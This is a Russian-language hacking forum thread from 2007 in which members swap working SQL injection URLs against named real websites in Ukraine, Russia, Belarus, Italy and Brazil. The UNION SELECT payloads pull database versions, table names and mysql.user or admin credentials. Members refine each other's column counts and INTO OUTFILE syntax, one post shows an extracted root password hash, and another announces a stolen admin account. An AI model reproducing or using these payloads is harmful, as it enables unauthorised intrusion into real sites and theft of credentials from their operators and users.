HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1761  
Старый 08.04.2007, 20:35
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Tut.by
Огроменный портал...

Цитата:
http://catalog.tut.by/list.phtml?form[catid]=8+union+select+1,2,3,4,5,6,7,8,9,10/*
Очевидно, юзеры в другой БД, имя которой я пока не угадал =(

___________

Таблиц не подобрал.

Цитата:
http://www.extremeua.com/index.php?lang=rus&c=4&base=RockArea&id=3+union+se lect+1,2,3,4,5,6,7

Последний раз редактировалось Fr-Ron; 08.04.2007 в 21:43..
 
Ответить с цитированием

  #1762  
Старый 08.04.2007, 20:57
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/*
устал подберать количество столбцов . . .
 
Ответить с цитированием

  #1763  
Старый 08.04.2007, 21:07
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+16,1/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+168,1/*
 
Ответить с цитированием

  #1764  
Старый 08.04.2007, 21:46
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от KPOT_f!nd  
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/*
устал подберать количество столбцов . . .
Зато мы подобрали. Ты немного переборщил. Вот как надо:
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20limit+0,1+INTO+OUTFILE+'test'/*
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #1765  
Старый 08.04.2007, 22:13
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Код:
http://www.ipsnotizie.it/nota.php?idnews=-619+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
 
Ответить с цитированием

  #1766  
Старый 08.04.2007, 22:32
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Web studio... Блин, свой сайт до ума не доведут, но под заказ от 200 у.е. - пожалуйста...
К mysql.user доступ закрыт, но мож кто-то таблиц найдет каких =)

Цитата:
http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=50+union+select+1,2,3,con cat(version(),char(58),char(58),char(58),user()),5
 
Ответить с цитированием

  #1767  
Старый 08.04.2007, 22:33
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от ShadOS  
Зато мы подобрали. Ты немного переборщил. Вот как надо:
Код:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20limit+0,1+INTO+OUTFILE+'test'/*
ты все перепутал запись в файл делается так
select+1,2,3,4,5,'тут данные которые будут записаны в файл'+from+mysql.user+into+outfile+'а тут папка куда записать'/*
 
Ответить с цитированием

  #1768  
Старый 08.04.2007, 22:39
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.radiobras.gov.br

Уже и бразилия =\

Код:
http://www.radiobras.gov.br/materia_i_2004.php?materia=-258494+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),10,11,12,13,14+from+mysql.user/*
кажись так :

root:6578c02369b5e3a9
 
Ответить с цитированием

  #1769  
Старый 08.04.2007, 22:44
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Код:
http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
Код:
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=
 
Ответить с цитированием

  #1770  
Старый 08.04.2007, 22:47
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Goudini  
Код:
http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
Код:
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=
Код:
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(login,char(58),pwd),3,4+from+admins/*&cy=&cm=
а вот и админский акк /me пока ее ищет

Последний раз редактировалось }{0TT@БЬ)Ч; 08.04.2007 в 22:50..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ